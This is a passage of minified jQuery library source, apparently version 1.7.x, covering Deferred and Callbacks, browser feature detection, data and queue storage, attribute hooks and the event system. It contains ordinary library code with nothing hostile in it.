d=a[c];c=a,a=d}if(!e.isFunction(a))return b;var f=F.call(arguments,2),g=function(){return a.apply(c,f.concat(F.call(arguments)))};g.guid=a.guid=a.guid||g.guid||e.guid++;return g},access:function(a,c,d,f,g,h,i){var j,k=d==null,l=0,m=a.length;if(d&&typeof d=="object"){for(l in d)e.access(a,c,l,d[l],1,h,f);g=1}else if(f!==b){j=i===b&&e.isFunction(f),k&&(j?(j=c,c=function(a,b,c){return j.call(e(a),c)}):(c.call(a,f),c=null));if(c)for(;l<m;l++)c(a[l],d,j?f.call(a[l],l,c(a[l],d)):f,i);g=1}return g?a:k?c.call(a):m?c(a[0],d):h},now:function(){return(new Date).getTime()},uaMatch:function(a){a=a.toLowerCase();var b=r.exec(a)||s.exec(a)||t.exec(a)||a.indexOf("compatible")<0&&u.exec(a)||[];return{browser:b[1]||"",version:b[2]||"0"}},sub:function(){function a(b,c){return new a.fn.init(b,c)}e.extend(!0,a,this),a.superclass=this,a.fn=a.prototype=this(),a.fn.constructor=a,a.sub=this.sub,a.fn.init=function(d,f){f&&f instanceof e&&!(f instanceof a)&&(f=a(f));return e.fn.init.call(this,d,f,b)},a.fn.init.prototype=a.fn;var b=a(c);return a},browser:{}}),e.each("Boolean Number String Function Array Date RegExp Object".split(" "),function(a,b){I["[object "+b+"]"]=b.toLowerCase()}),z=e.uaMatch(y),z.browser&&(e.browser[z.browser]=!0,e.browser.version=z.version),e.browser.webkit&&(e.browser.safari=!0),j.test(" ")&&(k=/^[\s\xA0]+/,l=/[\s\xA0]+$/),h=e(c),c.addEventListener?B=function(){c.removeEventListener("DOMContentLoaded",B,!1),e.ready()}:c.attachEvent&&(B=function(){c.readyState==="complete"&&(c.detachEvent("onreadystatechange",B),e.ready())});return e}(),g={};f.Callbacks=function(a){a=a?g[a]||h(a):{};var c=[],d=[],e,i,j,k,l,m,n=function(b){var d,e,g,h,i;for(d=0,e=b.length;d<e;d++)g=b[d],h=f.type(g),h==="array"?n(g):h==="function"&&(!a.unique||!p.has(g))&&c.push(g)},o=function(b,f){f=f||[],e=!a.memory||[b,f],i=!0,j=!0,m=k||0,k=0,l=c.length;for(;c&&m<l;m++)if(c[m].apply(b,f)===!1&&a.stopOnFalse){e=!0;break}j=!1,c&&(a.once?e===!0?p.disable():c=[]:d&&d.length&&(e=d.shift(),p.fireWith(e[0],e[1])))},p={add:function(){if(c){var a=c.length;n(arguments),j?l=c.length:e&&e!==!0&&(k=a,o(e[0],e[1]))}return this},remove:function(){if(c){var b=arguments,d=0,e=b.length;for(;d<e;d++)for(var f=0;f<c.length;f++)if(b[d]===c[f]){j&&f<=l&&(l--,f<=m&&m--),c.splice(f--,1);if(a.unique)break}}return this},has:function(a){if(c){var b=0,d=c.length;for(;b<d;b++)if(a===c[b])return!0}return!1},empty:function(){c=[];return this},disable:function(){c=d=e=b;return this},disabled:function(){return!c},lock:function(){d=b,(!e||e===!0)&&p.disable();return this},locked:function(){return!d},fireWith:function(b,c){d&&(j?a.once||d.push([b,c]):(!a.once||!e)&&o(b,c));return this},fire:function(){p.fireWith(this,arguments);return this},fired:function(){return!!i}};return p};var i=[].slice;f.extend({Deferred:function(a){var b=f.Callbacks("once memory"),c=f.Callbacks("once memory"),d=f.Callbacks("memory"),e="pending",g={resolve:b,reject:c,notify:d},h={done:b.add,fail:c.add,progress:d.add,state:function(){return e},isResolved:b.fired,isRejected:c.fired,then:function(a,b,c){i.done(a).fail(b).progress(c);return this},always:function(){i.done.apply(i,arguments).fail.apply(i,arguments);return this},pipe:function(a,b,c){return f.Deferred(function(d){f.each({done:[a,"resolve"],fail:[b,"reject"],progress:[c,"notify"]},function(a,b){var c=b[0],e=b[1],g;f.isFunction(c)?i[a](function(){g=c.apply(this,arguments),g&&f.isFunction(g.promise)?g.promise().then(d.resolve,d.reject,d.notify):d[e+"With"](this===i?d:this,[g])}):i[a](d[e])})}).promise()},promise:function(a){if(a==null)a=h;else for(var b in h)a[b]=h[b];return a}},i=h.promise({}),j;for(j in g)i[j]=g[j].fire,i[j+"With"]=g[j].fireWith;i.done(function(){e="resolved"},c.disable,d.lock).fail(function(){e="rejected"},b.disable,d.lock),a&&a.call(i,i);return i},when:function(a){function m(a){return function(b){e[a]=arguments.length>1?i.call(arguments,0):b,j.notifyWith(k,e)}}function l(a){return function(c){b[a]=arguments.length>1?i.call(arguments,0):c,--g||j.resolveWith(j,b)}}var b=i.call(arguments,0),c=0,d=b.length,e=Array(d),g=d,h=d,j=d<=1&&a&&f.isFunction(a.promise)?a:f.Deferred(),k=j.promise();if(d>1){for(;c<d;c++)b[c]&&b[c].promise&&f.isFunction(b[c].promise)?b[c].promise().then(l(c),j.reject,m(c)):--g;g||j.resolveWith(j,b)}else j!==a&&j.resolveWith(j,d?[a]:[]);return k}}),f.support=function(){var b,d,e,g,h,i,j,k,l,m,n,o,p=c.createElement("div"),q=c.documentElement;p.setAttribute("className","t"),p.innerHTML=" <link/><table></table><a href='/a' style='top:1px;float:left;opacity:.55;'>a</a><input type='checkbox'/>",d=p.getElementsByTagName("*"),e=p.getElementsByTagName("a")[0];if(!d||!d.length||!e)return{};g=c.createElement("select"),h=g.appendChild(c.createElement("option")),i=p.getElementsByTagName("input")[0],b={leadingWhitespace:p.firstChild.nodeType===3,tbody:!p.getElementsByTagName("tbody").length,htmlSerialize:!!p.getElementsByTagName("link").length,style:/top/.test(e.getAttribute("style")),hrefNormalized:e.getAttribute("href")==="/a",opacity:/^0.55/.test(e.style.opacity),cssFloat:!!e.style.cssFloat,checkOn:i.value==="on",optSelected:h.selected,getSetAttribute:p.className!=="t",enctype:!!c.createElement("form").enctype,html5Clone:c.createElement("nav").cloneNode(!0).outerHTML!=="<:nav></:nav>",submitBubbles:!0,changeBubbles:!0,focusinBubbles:!1,deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0,pixelMargin:!0},f.boxModel=b.boxModel=c.compatMode==="CSS1Compat",i.checked=!0,b.noCloneChecked=i.cloneNode(!0).checked,g.disabled=!0,b.optDisabled=!h.disabled;try{delete p.test}catch(r){b.deleteExpando=!1}!p.addEventListener&&p.attachEvent&&p.fireEvent&&(p.attachEvent("onclick",function(){b.noCloneEvent=!1}),p.cloneNode(!0).fireEvent("onclick")),i=c.createElement("input"),i.value="t",i.setAttribute("type","radio"),b.radioValue=i.value==="t",i.setAttribute("checked","checked"),i.setAttribute("name","t"),p.appendChild(i),j=c.createDocumentFragment(),j.appendChild(p.lastChild),b.checkClone=j.cloneNode(!0).cloneNode(!0).lastChild.checked,b.appendChecked=i.checked,j.removeChild(i),j.appendChild(p);if(p.attachEvent)for(n in{submit:1,change:1,focusin:1})m="on"+n,o=m in p,o||(p.setAttribute(m,"return;"),o=typeof p[m]=="function"),b[n+"Bubbles"]=o;j.removeChild(p),j=g=h=p=i=null,f(function(){var d,e,g,h,i,j,l,m,n,q,r,s,t,u=c.getElementsByTagName("body")[0];!u||(m=1,t="padding:0;margin:0;border:",r="position:absolute;top:0;left:0;width:1px;height:1px;",s=t+"0;visibility:hidden;",n="style='"+r+t+"5px solid #000;",q="<div "+n+"display:block;'><div style='"+t+"0;display:block;overflow:hidden;'></div></div>"+"<table "+n+"' cellpadding='0' cellspacing='0'>"+"<tr><td></td></tr></table>",d=c.createElement("div"),d.style.cssText=s+"width:0;height:0;position:static;top:0;margin-top:"+m+"px",u.insertBefore(d,u.firstChild),p=c.createElement("div"),d.appendChild(p),p.innerHTML="<table><tr><td style='"+t+"0;display:none'></td><td>t</td></tr></table>",k=p.getElementsByTagName("td"),o=k[0].offsetHeight===0,k[0].style.display="",k[1].style.display="none",b.reliableHiddenOffsets=o&&k[0].offsetHeight===0,a.getComputedStyle&&(p.innerHTML="",l=c.createElement("div"),l.style.width="0",l.style.marginRight="0",p.style.width="2px",p.appendChild(l),b.reliableMarginRight=(parseInt((a.getComputedStyle(l,null)||{marginRight:0}).marginRight,10)||0)===0),typeof p.style.zoom!="undefined"&&(p.innerHTML="",p.style.width=p.style.padding="1px",p.style.border=0,p.style.overflow="hidden",p.style.display="inline",p.style.zoom=1,b.inlineBlockNeedsLayout=p.offsetWidth===3,p.style.display="block",p.style.overflow="visible",p.innerHTML="<div style='width:5px;'></div>",b.shrinkWrapBlocks=p.offsetWidth!==3),p.style.cssText=r+s,p.innerHTML=q,e=p.firstChild,g=e.firstChild,i=e.nextSibling.firstChild.firstChild,j={doesNotAddBorder:g.offsetTop!==5,doesAddBorderForTableAndCells:i.offsetTop===5},g.style.position="fixed",g.style.top="20px",j.fixedPosition=g.offsetTop===20||g.offsetTop===15,g.style.position=g.style.top="",e.style.overflow="hidden",e.style.position="relative",j.subtractsBorderForOverflowNotVisible=g.offsetTop===-5,j.doesNotIncludeMarginInBodyOffset=u.offsetTop!==m,a.getComputedStyle&&(p.style.marginTop="1%",b.pixelMargin=(a.getComputedStyle(p,null)||{marginTop:0}).marginTop!=="1%"),typeof d.style.zoom!="undefined"&&(d.style.zoom=1),u.removeChild(d),l=p=d=null,f.extend(b,j))});return b}();var j=/^(?:\{.*\}|\[.*\])$/,k=/([A-Z])/g;f.extend({cache:{},uuid:0,expando:"jQuery"+(f.fn.jquery+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(a){a=a.nodeType?f.cache[a[f.expando]]:a[f.expando];return!!a&&!m(a)},data:function(a,c,d,e){if(!!f.acceptData(a)){var g,h,i,j=f.expando,k=typeof c=="string",l=a.nodeType,m=l?f.cache:a,n=l?a[j]:a[j]&&j,o=c==="events";if((!n||!m[n]||!o&&!e&&!m[n].data)&&k&&d===b)return;n||(l?a[j]=n=++f.uuid:n=j),m[n]||(m[n]={},l||(m[n].toJSON=f.noop));if(typeof c=="object"||typeof c=="function")e?m[n]=f.extend(m[n],c):m[n].data=f.extend(m[n].data,c);g=h=m[n],e||(h.data||(h.data={}),h=h.data),d!==b&&(h[f.camelCase(c)]=d);if(o&&!h[c])return g.events;k?(i=h[c],i==null&&(i=h[f.camelCase(c)])):i=h;return i}},removeData:function(a,b,c){if(!!f.acceptData(a)){var d,e,g,h=f.expando,i=a.nodeType,j=i?f.cache:a,k=i?a[h]:h;if(!j[k])return;if(b){d=c?j[k]:j[k].data;if(d){f.isArray(b)||(b in d?b=[b]:(b=f.camelCase(b),b in d?b=[b]:b=b.split(" ")));for(e=0,g=b.length;e<g;e++)delete d[b[e]];if(!(c?m:f.isEmptyObject)(d))return}}if(!c){delete j[k].data;if(!m(j[k]))return}f.support.deleteExpando||!j.setInterval?delete j[k]:j[k]=null,i&&(f.support.deleteExpando?delete a[h]:a.removeAttribute?a.removeAttribute(h):a[h]=null)}},_data:function(a,b,c){return f.data(a,b,c,!0)},acceptData:function(a){if(a.nodeName){var b=f.noData[a.nodeName.toLowerCase()];if(b)return b!==!0&&a.getAttribute("classid")===b}return!0}}),f.fn.extend({data:function(a,c){var d,e,g,h,i,j=this[0],k=0,m=null;if(a===b){if(this.length){m=f.data(j);if(j.nodeType===1&&!f._data(j,"parsedAttrs")){g=j.attributes;for(i=g.length;k<i;k++)h=g[k].name,h.indexOf("data-")===0&&(h=f.camelCase(h.substring(5)),l(j,h,m[h]));f._data(j,"parsedAttrs",!0)}}return m}if(typeof a=="object")return this.each(function(){f.data(this,a)});d=a.split(".",2),d[1]=d[1]?"."+d[1]:"",e=d[1]+"!";return f.access(this,function(c){if(c===b){m=this.triggerHandler("getData"+e,[d[0]]),m===b&&j&&(m=f.data(j,a),m=l(j,a,m));return m===b&&d[1]?this.data(d[0]):m}d[1]=c,this.each(function(){var b=f(this);b.triggerHandler("setData"+e,d),f.data(this,a,c),b.triggerHandler("changeData"+e,d)})},null,c,arguments.length>1,null,!1)},removeData:function(a){return this.each(function(){f.removeData(this,a)})}}),f.extend({_mark:function(a,b){a&&(b=(b||"fx")+"mark",f._data(a,b,(f._data(a,b)||0)+1))},_unmark:function(a,b,c){a!==!0&&(c=b,b=a,a=!1);if(b){c=c||"fx";var d=c+"mark",e=a?0:(f._data(b,d)||1)-1;e?f._data(b,d,e):(f.removeData(b,d,!0),n(b,c,"mark"))}},queue:function(a,b,c){var d;if(a){b=(b||"fx")+"queue",d=f._data(a,b),c&&(!d||f.isArray(c)?d=f._data(a,b,f.makeArray(c)):d.push(c));return d||[]}},dequeue:function(a,b){b=b||"fx";var c=f.queue(a,b),d=c.shift(),e={};d==="inprogress"&&(d=c.shift()),d&&(b==="fx"&&c.unshift("inprogress"),f._data(a,b+".run",e),d.call(a,function(){f.dequeue(a,b)},e)),c.length||(f.removeData(a,b+"queue "+b+".run",!0),n(a,b,"queue"))}}),f.fn.extend({queue:function(a,c){var d=2;typeof a!="string"&&(c=a,a="fx",d--);if(arguments.length<d)return f.queue(this[0],a);return c===b?this:this.each(function(){var b=f.queue(this,a,c);a==="fx"&&b[0]!=="inprogress"&&f.dequeue(this,a)})},dequeue:function(a){return this.each(function(){f.dequeue(this,a)})},delay:function(a,b){a=f.fx?f.fx.speeds[a]||a:a,b=b||"fx";return this.queue(b,function(b,c){var d=setTimeout(b,a);c.stop=function(){clearTimeout(d)}})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,c){function m(){--h||d.resolveWith(e,[e])}typeof a!="string"&&(c=a,a=b),a=a||"fx";var d=f.Deferred(),e=this,g=e.length,h=1,i=a+"defer",j=a+"queue",k=a+"mark",l;while(g--)if(l=f.data(e[g],i,b,!0)||(f.data(e[g],j,b,!0)||f.data(e[g],k,b,!0))&&f.data(e[g],i,f.Callbacks("once memory"),!0))h++,l.add(m);m();return d.promise(c)}});var o=/[\n\t\r]/g,p=/\s+/,q=/\r/g,r=/^(?:button|input)$/i,s=/^(?:button|input|object|select|textarea)$/i,t=/^a(?:rea)?$/i,u=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,v=f.support.getSetAttribute,w,x,y;f.fn.extend({attr:function(a,b){return f.access(this,f.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){f.removeAttr(this,a)})},prop:function(a,b){return f.access(this,f.prop,a,b,arguments.length>1)},removeProp:function(a){a=f.propFix[a]||a;return this.each(function(){try{this[a]=b,delete this[a]}catch(c){}})},addClass:function(a){var b,c,d,e,g,h,i;if(f.isFunction(a))return this.each(function(b){f(this).addClass(a.call(this,b,this.className))});if(a&&typeof a=="string"){b=a.split(p);for(c=0,d=this.length;c<d;c++){e=this[c];if(e.nodeType===1)if(!e.className&&b.length===1)e.className=a;else{g=" "+e.className+" ";for(h=0,i=b.length;h<i;h++)~g.indexOf(" "+b[h]+" ")||(g+=b[h]+" ");e.className=f.trim(g)}}}return this},removeClass:function(a){var c,d,e,g,h,i,j;if(f.isFunction(a))return this.each(function(b){f(this).removeClass(a.call(this,b,this.className))});if(a&&typeof a=="string"||a===b){c=(a||"").split(p);for(d=0,e=this.length;d<e;d++){g=this[d];if(g.nodeType===1&&g.className)if(a){h=(" "+g.className+" ").replace(o," ");for(i=0,j=c.length;i<j;i++)h=h.replace(" "+c[i]+" "," ");g.className=f.trim(h)}else g.className=""}}return this},toggleClass:function(a,b){var c=typeof a,d=typeof b=="boolean";if(f.isFunction(a))return this.each(function(c){f(this).toggleClass(a.call(this,c,this.className,b),b)});return this.each(function(){if(c==="string"){var e,g=0,h=f(this),i=b,j=a.split(p);while(e=j[g++])i=d?i:!h.hasClass(e),h[i?"addClass":"removeClass"](e)}else if(c==="undefined"||c==="boolean")this.className&&f._data(this,"__className__",this.className),this.className=this.className||a===!1?"":f._data(this,"__className__")||""})},hasClass:function(a){var b=" "+a+" ",c=0,d=this.length;for(;c<d;c++)if(this[c].nodeType===1&&(" "+this[c].className+" ").replace(o," ").indexOf(b)>-1)return!0;return!1},val:function(a){var c,d,e,g=this[0];{if(!!arguments.length){e=f.isFunction(a);return this.each(function(d){var g=f(this),h;if(this.nodeType===1){e?h=a.call(this,d,g.val()):h=a,h==null?h="":typeof h=="number"?h+="":f.isArray(h)&&(h=f.map(h,function(a){return a==null?"":a+""})),c=f.valHooks[this.type]||f.valHooks[this.nodeName.toLowerCase()];if(!c||!("set"in c)||c.set(this,h,"value")===b)this.value=h}})}if(g){c=f.valHooks[g.type]||f.valHooks[g.nodeName.toLowerCase()];if(c&&"get"in c&&(d=c.get(g,"value"))!==b)return d;d=g.value;return typeof d=="string"?d.replace(q,""):d==null?"":d}}}}),f.extend({valHooks:{option:{get:function(a){var b=a.attributes.value;return!b||b.specified?a.value:a.text}},select:{get:function(a){var b,c,d,e,g=a.selectedIndex,h=[],i=a.options,j=a.type==="select-one";if(g<0)return null;c=j?g:0,d=j?g+1:i.length;for(;c<d;c++){e=i[c];if(e.selected&&(f.support.optDisabled?!e.disabled:e.getAttribute("disabled")===null)&&(!e.parentNode.disabled||!f.nodeName(e.parentNode,"optgroup"))){b=f(e).val();if(j)return b;h.push(b)}}if(j&&!h.length&&i.length)return f(i[g]).val();return h},set:function(a,b){var c=f.makeArray(b);f(a).find("option").each(function(){this.selected=f.inArray(f(this).val(),c)>=0}),c.length||(a.selectedIndex=-1);return c}}},attrFn:{val:!0,css:!0,html:!0,text:!0,data:!0,width:!0,height:!0,offset:!0},attr:function(a,c,d,e){var g,h,i,j=a.nodeType;if(!!a&&j!==3&&j!==8&&j!==2){if(e&&c in f.attrFn)return f(a)[c](d);if(typeof a.getAttribute=="undefined")return f.prop(a,c,d);i=j!==1||!f.isXMLDoc(a),i&&(c=c.toLowerCase(),h=f.attrHooks[c]||(u.test(c)?x:w));if(d!==b){if(d===null){f.removeAttr(a,c);return}if(h&&"set"in h&&i&&(g=h.set(a,d,c))!==b)return g;a.setAttribute(c,""+d);return d}if(h&&"get"in h&&i&&(g=h.get(a,c))!==null)return g;g=a.getAttribute(c);return g===null?b:g}},removeAttr:function(a,b){var c,d,e,g,h,i=0;if(b&&a.nodeType===1){d=b.toLowerCase().split(p),g=d.length;for(;i<g;i++)e=d[i],e&&(c=f.propFix[e]||e,h=u.test(e),h||f.attr(a,e,""),a.removeAttribute(v?e:c),h&&c in a&&(a[c]=!1))}},attrHooks:{type:{set:function(a,b){if(r.test(a.nodeName)&&a.parentNode)f.error("type property can't be changed");else if(!f.support.radioValue&&b==="radio"&&f.nodeName(a,"input")){var c=a.value;a.setAttribute("type",b),c&&(a.value=c);return b}}},value:{get:function(a,b){if(w&&f.nodeName(a,"button"))return w.get(a,b);return b in a?a.value:null},set:function(a,b,c){if(w&&f.nodeName(a,"button"))return w.set(a,b,c);a.value=b}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(a,c,d){var e,g,h,i=a.nodeType;if(!!a&&i!==3&&i!==8&&i!==2){h=i!==1||!f.isXMLDoc(a),h&&(c=f.propFix[c]||c,g=f.propHooks[c]);return d!==b?g&&"set"in g&&(e=g.set(a,d,c))!==b?e:a[c]=d:g&&"get"in g&&(e=g.get(a,c))!==null?e:a[c]}},propHooks:{tabIndex:{get:function(a){var c=a.getAttributeNode("tabindex");return c&&c.specified?parseInt(c.value,10):s.test(a.nodeName)||t.test(a.nodeName)&&a.href?0:b}}}}),f.attrHooks.tabindex=f.propHooks.tabIndex,x={get:function(a,c){var d,e=f.prop(a,c);return e===!0||typeof e!="boolean"&&(d=a.getAttributeNode(c))&&d.nodeValue!==!1?c.toLowerCase():b},set:function(a,b,c){var d;b===!1?f.removeAttr(a,c):(d=f.propFix[c]||c,d in a&&(a[d]=!0),a.setAttribute(c,c.toLowerCase()));return c}},v||(y={name:!0,id:!0,coords:!0},w=f.valHooks.button={get:function(a,c){var d;d=a.getAttributeNode(c);return d&&(y[c]?d.nodeValue!=="":d.specified)?d.nodeValue:b},set:function(a,b,d){var e=a.getAttributeNode(d);e||(e=c.createAttribute(d),a.setAttributeNode(e));return e.nodeValue=b+""}},f.attrHooks.tabindex.set=w.set,f.each(["width","height"],function(a,b){f.attrHooks[b]=f.extend(f.attrHooks[b],{set:function(a,c){if(c===""){a.setAttribute(b,"auto");return c}}})}),f.attrHooks.contenteditable={get:w.get,set:function(a,b,c){b===""&&(b="false"),w.set(a,b,c)}}),f.support.hrefNormalized||f.each(["href","src","width","height"],function(a,c){f.attrHooks[c]=f.extend(f.attrHooks[c],{get:function(a){var d=a.getAttribute(c,2);return d===null?b:d}})}),f.support.style||(f.attrHooks.style={get:function(a){return a.style.cssText.toLowerCase()||b},set:function(a,b){return a.style.cssText=""+b}}),f.support.optSelected||(f.propHooks.selected=f.extend(f.propHooks.selected,{get:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex);return null}})),f.support.enctype||(f.propFix.enctype="encoding"),f.support.checkOn||f.each(["radio","checkbox"],function(){f.valHooks[this]={get:function(a){return a.getAttribute("value")===null?"on":a.value}}}),f.each(["radio","checkbox"],function(){f.valHooks[this]=f.extend(f.valHooks[this],{set:function(a,b){if(f.isArray(b))return a.checked=f.inArray(f(a).val(),b)>=0}})});var z=/^(?:textarea|input|select)$/i,A=/^([^\.]*)?(?:\.(.+))?$/,B=/(?:^|\s)hover(\.\S+)?\b/,C=/^key/,D=/^(?:mouse|contextmenu)|click/,E=/^(?:focusinfocus|focusoutblur)$/,F=/^(\w*)(?:#([\w\-]+))?(?:\.([\w\-]+))?$/,G=function(
|
3 |
+
a){var b=F.exec(a);b&&(b[1]=(b[1]||"").toLowerCase(),b[3]=b[3]&&new RegExp("(?:^|\\s)"+b[3]+"(?:\\s|$)"));return b},H=function(a,b){var c=a.attributes||{};return(!b[1]||a.nodeName.toLowerCase()===b[1])&&(!b[2]||(c.id||{}).value===b[2])&&(!b[3]||b[3].test((c["class"]||{}).value))},I=function(a){return f.event.special.hover?a:a.replace(B,"mouseenter$1 mouseleave$1")};f.event={add:function(a,c,d,e,g){var h,i,j,k,l,m,n,o,p,q,r,s;if(!(a.nodeType===3||a.nodeType===8||!c||!d||!(h=f._data(a)))){d.handler&&(p=d,d=p.handler,g=p.selector),d.guid||(d.guid=f.guid++),j=h.events,j||(h.events=j={}),i=h.handle,i||(h.handle=i=function(a){return typeof f!="undefined"&&(!a||f.event.triggered!==a.type)?f.event.dispatch.apply(i.elem,arguments):b},i.elem=a),c=f.trim(I(c)).split(" ");for(k=0;k<c.length;k++){l=A.exec(c[k])||[],m=l[1],n=(l[2]||"").split(".").sort(),s=f.event.special[m]||{},m=(g?s.delegateType:s.bindType)||m,s=f.event.special[m]||{},o=f.extend({type:m,origType:l[1],data:e,handler:d,guid:d.guid,selector:g,quick:g&&G(g),namespace:n.join(".")},p),r=j[m];if(!r){r=j[m]=[],r.delegateCount=0;if(!s.setup||s.setup.call(a,e,n,i)===!1)a.addEventListener?a.addEventListener(m,i,!1):a.attachEvent&&a.attachEvent("on"+m,i)}s.add&&(s.add.call(a,o),o.handler.guid||(o.handler.guid=d.guid)),g?r.splice(r.delegateCount++,0,o):r.push(o),f.event.global[m]=!0}a=null}},global:{},remove:function(a,b,c,d,e){var g=f.hasData(a)&&f._data(a),h,i,j,k,l,m,n,o,p,q,r,s;if(!!g&&!!(o=g.events)){b=f.trim(I(b||"")).split(" ");for(h=0;h<b.length;h++){i=A.exec(b[h])||[],j=k=i[1],l=i[2];if(!j){for(j in o)f.event.remove(a,j+b[h],c,d,!0);continue}p=f.event.special[j]||{},j=(d?p.delegateType:p.bindType)||j,r=o[j]||[],m=r.length,l=l?new RegExp("(^|\\.)"+l.split(".").sort().join("\\.(?:.*\\.)?")+"(\\.|$)"):null;for(n=0;n<r.length;n++)s=r[n],(e||k===s.origType)&&(!c||c.guid===s.guid)&&(!l||l.test(s.namespace))&&(!d||d===s.selector||d==="**"&&s.selector)&&(r.splice(n--,1),s.selector&&r.delegateCount--,p.remove&&p.remove.call(a,s));r.length===0&&m!==r.length&&((!p.teardown||p.teardown.call(a,l)===!1)&&f.removeEvent(a,j,g.handle),delete o[j])}f.isEmptyObject(o)&&(q=g.handle,q&&(q.elem=null),f.removeData(a,["events","handle"],!0))}},customEvent:{getData:!0,setData:!0,changeData:!0},trigger:function(c,d,e,g){if(!e||e.nodeType!==3&&e.nodeType!==8){var h=c.type||c,i=[],j,k,l,m,n,o,p,q,r,s;if(E.test(h+f.event.triggered))return;h.indexOf("!")>=0&&(h=h.slice(0,-1),k=!0),h.indexOf(".")>=0&&(i=h.split("."),h=i.shift(),i.sort());if((!e||f.event.customEvent[h])&&!f.event.global[h])return;c=typeof c=="object"?c[f.expando]?c:new f.Event(h,c):new f.Event(h),c.type=h,c.isTrigger=!0,c.exclusive=k,c.namespace=i.join("."),c.namespace_re=c.namespace?new RegExp("(^|\\.)"+i.join("\\.(?:.*\\.)?")+"(\\.|$)"):null,o=h.indexOf(":")<0?"on"+h:"";if(!e){j=f.cache;for(l in j)j[l].events&&j[l].events[h]&&f.event.trigger(c,d,j[l].handle.elem,!0);return}c.result=b,c.target||(c.target=e),d=d!=null?f.makeArray(d):[],d.unshift(c),p=f.event.special[h]||{};if(p.trigger&&p.trigger.apply(e,d)===!1)return;r=[[e,p.bindType||h]];if(!g&&!p.noBubble&&!f.isWindow(e)){s=p.delegateType||h,m=E.test(s+h)?e:e.parentNode,n=null;for(;m;m=m.parentNode)r.push([m,s]),n=m;n&&n===e.ownerDocument&&r.push([n.defaultView||n.parentWindow||a,s])}for(l=0;l<r.length&&!c.isPropagationStopped();l++)m=r[l][0],c.type=r[l][1],q=(f._data(m,"events")||{})[c.type]&&f._data(m,"handle"),q&&q.apply(m,d),q=o&&m[o],q&&f.acceptData(m)&&q.apply(m,d)===!1&&c.preventDefault();c.type=h,!g&&!c.isDefaultPrevented()&&(!p._default||p._default.apply(e.ownerDocument,d)===!1)&&(h!=="click"||!f.nodeName(e,"a"))&&f.acceptData(e)&&o&&e[h]&&(h!=="focus"&&h!=="blur"||c.target.offsetWidth!==0)&&!f.isWindow(e)&&(n=e[o],n&&(e[o]=null),f.event.triggered=h,e[h](),f.event.triggered=b,n&&(e[o]=n));return c.result}},dispatch:function(c){c=f.event.fix(c||a.event);var d=(f._data(this,"events")||{})[c.type]||[],e=d.delegateCount,g=[].slice.call(arguments,0),h=!c.exclusive&&!c.namespace,i=f.event.special[c.type]||{},j=[],k,l,m,n,o,p,q,r,s,t,u;g[0]=c,c.delegateTarget=this;if(!i.preDispatch||i.preDispatch.call(this,c)!==!1){if(e&&(!c.button||c.type!=="click")){n=f(this),n.context=this.ownerDocument||this;for(m=c.target;m!=this;m=m.parentNode||this)if(m.disabled!==!0){p={},r=[],n[0]=m;for(k=0;k<e;k++)s=d[k],t=s.selector,p[t]===b&&(p[t]=s.quick?H(m,s.quick):n.is(t)),p[t]&&r.push(s);r.length&&j.push({elem:m,matches:r})}}d.length>e&&j.push({elem:this,matches:d.slice(e)});for(k=0;k<j.length&&!c.isPropagationStopped();k++){q=j[k],c.currentTarget=q.elem;for(l=0;l<q.matches.length&&!c.isImmediatePropagationStopped();l++){s=q.matches[l];if(h||!c.namespace&&!s.namespace||c.namespace_re&&c.namespace_re.test(s.namespace))c.data=s.data,c.handleObj=s,o=((f.event.special[s.origType]||{}).handle||s.handler).apply(q.elem,g),o!==b&&(c.result=o,o===!1&&(c.preventDefault(),c.stopPropagation()))}}i.postDispatch&&i.postDispatch.call(this,c);return c.result}},props:"attrChange attrName relatedNode srcElement altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){a.which==null&&(a.which=b.charCode!=null?b.charCode:b.keyCode);return a}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,d){var e,f,g,h=d.button,i=d.fromElement;a.pageX==null&&d.clientX!=null&&(e=a.target.ownerDocument||c,f=e.documentElement,g=e.body,a.pageX=d.clientX+(f&&f.scrollLeft||g&&g.scrollLeft||0)-(f&&f.clientLeft||g&&g.clientLeft||0),a.pageY=d.clientY+(f&&f.scrollTop||g&&g.scrollTop||0)-(f&&f.clientTop||g&&g.clientTop||0)),!a.relatedTarget&&i&&(a.relatedTarget=i===a.target?d.toElement:i),!a.which&&h!==b&&(a.which=h&1?1:h&2?3:h&4?2:0);return a}},fix:function(a){if(a[f.expando])return a;var d,e,g=a,h=f.event.fixHooks[a.type]||{},i=h.props?this.props.concat(h.props):this.props;a=f.Event(g);for(d=i.length;d;)e=i[--d],a[e]=g[e];a.target||(a.target=g.srcElement||c),a.target.nodeType===3&&(a.target=a.target.parentNode),a.metaKey===b&&(a.metaKey=a.ctrlKey);return h.filter?h.filter(a,g):a},special:{ready:{setup:f.bindReady},load:{noBubble:!0},focus:{delegateType:"focusin"},blur:{delegateType:"focusout"},beforeunload:{setup:function(a,b,c){f.isWindow(this)&&(this.onbeforeunload=c)},teardown:function(a,b){this.onbeforeunload===b&&(this.onbeforeunload=null)}}},simulate:function(a,b,c,d){var e=f.extend(new f.Event,c,{type:a,isSimulated:!0,originalEvent:{}});d?f.event.trigger(e,null,b):f.event.dispatch.call(b,e),e.isDefaultPrevented()&&c.preventDefault()}},f.event.handle=f.event.dispatch,f.removeEvent=c.removeEventListener?function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)}:function(a,b,c){a.detachEvent&&a.detachEvent("on"+b,c)},f.Event=function(a,b){if(!(this instanceof f.Event))return new 